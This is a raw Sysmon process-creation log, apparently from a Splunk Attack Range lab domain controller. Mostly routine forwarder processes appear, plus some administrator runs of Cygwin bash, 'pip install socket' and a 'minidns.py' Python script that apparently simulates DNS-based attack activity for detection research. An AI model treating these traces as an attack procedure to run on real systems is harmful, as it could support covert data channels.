0x41CC:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8BFA89E9045A949619C8511955C39779,SHA256=7B4BB51FC16D1B4F44D2A73D9939C177008D5DB4E9EECCA42A9D01D90D7C8CEF,IMPHASH=DC4FCFEBC59A5F04DB2C6D852B01071C{A8622C2F-571F-6078-7E0D-00000000AE01}5744C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000064118Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.884{A8622C2F-571F-6078-7F0D-00000000AE01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064095Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.844{A8622C2F-571F-6078-7E0D-00000000AE01}5744C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000064067Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.281{A8622C2F-571F-6078-7D0D-00000000AE01}6912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064038Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:17.478{A8622C2F-571D-6078-7C0D-00000000AE01}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063995Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:16.948{A8622C2F-571C-6078-7A0D-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:16.282{A8622C2F-571C-6078-790D-00000000AE01}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063922Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:06.113{A8622C2F-5712-6078-780D-00000000AE01}2132C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063894Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:03.095{A8622C2F-570F-6078-770D-00000000AE01}3500C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063825Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:48.510{A8622C2F-5700-6078-760D-00000000AE01}6196C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063788Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:42.132{A8622C2F-56FA-6078-750D-00000000AE01}3376C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063736Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:31.611{A8622C2F-56EF-6078-740D-00000000AE01}5136C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063682Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:22.648{A8622C2F-56E6-6078-730D-00000000AE01}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:20.619{A8622C2F-56E4-6078-720D-00000000AE01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063648Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:20.216{A8622C2F-56E4-6078-710D-00000000AE01}5708C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"c:\program files\python38\python.exe" "C:\Program Files\Python38\Scripts\pip.exe" install socketC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-56E4-6078-700D-00000000AE01}6852C:\Program Files\Python38\Scripts\pip.exepip install socket 154100x800000000000000063640Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:20.203{A8622C2F-56E4-6078-700D-00000000AE01}6852C:\Program Files\Python38\Scripts\pip.exe-----pip install socketC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8C59BBC73977CF9EF0B1C926AB828274,SHA256=30FDEC6ED3761F1CFB7D32387BE22F827E2349CD81BFD03FF69B315834DA6175,IMPHASH=132E825E554E7B8D464D7812F8FB426A{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000063631Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:19.996{A8622C2F-56E3-6078-6F0D-00000000AE01}6440C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063621Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:19.313{A8622C2F-56E3-6078-6E0D-00000000AE01}5904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063596Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:17.593{A8622C2F-56E1-6078-6D0D-00000000AE01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063585Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:16.927{A8622C2F-56E0-6078-6C0D-00000000AE01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063575Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:16.276{A8622C2F-56E0-6078-6B0D-00000000AE01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063387Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:42.221{A8622C2F-56BE-6078-6A0D-00000000AE01}6944C:\cygwin64\bin\cut.exe-----cut -d ' ' -f1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-56BE-6078-680D-00000000AE01}804C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000063380Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:42.220{A8622C2F-56BE-6078-690D-00000000AE01}648C:\cygwin64\bin\hostname.exe-----hostname -I C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-56BE-6078-680D-00000000AE01}804C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000063372Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:42.214{A8622C2F-56BE-6078-680D-00000000AE01}804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-56BE-6078-670D-00000000AE01}4056C:\Python27\python.exeC:\Python27\python.exe minidns.py 154100x800000000000000063364Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:42.168{A8622C2F-56BE-6078-670D-00000000AE01}4056C:\Python27\python.exe-----C:\Python27\python.exe minidns.pyC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-56BE-6078-660D-00000000AE01}5376C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063345Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:42.158{A8622C2F-56BE-6078-660D-00000000AE01}5376C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063257Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:22.739{A8622C2F-56AA-6078-650D-00000000AE01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063234Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:20.634{A8622C2F-56A8-6078-640D-00000000AE01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063225Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:19.965{A8622C2F-56A7-6078-630D-00000000AE01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:19.302{A8622C2F-56A7-6078-620D-00000000AE01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063200Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:17.562{A8622C2F-56A5-6078-610D-00000000AE01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063190Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:16.911{A8622C2F-56A4-6078-600D-00000000AE01}5852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063178Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:16.291{A8622C2F-56A4-6078-5F0D-00000000AE01}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:07.053{A8622C2F-569B-6078-5E0D-00000000AE01}7120C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exehostname -I C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{A8622C2F-569B-6078-5D0D-00000000AE01}6452C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000063127Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:07.047{A8622C2F-569B-6078-5D0D-00000000AE01}6452C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-569B-6078-5C0D-00000000AE01}7016C:\Python27\python.exepython.exe c:\Temp\minidns.py 154100x800000000000000063119Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:07.001{A8622C2F-569B-6078-5C0D-00000000AE01}7016C:\Python27\python.exe-----python.exe c:\Temp\minidns.pyC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000063037Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:03.078{A8622C2F-5697-6078-5A0D-00000000AE01}4196C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {24AC8F2B-4D4A-4C17-9607-6A4B14068F97} 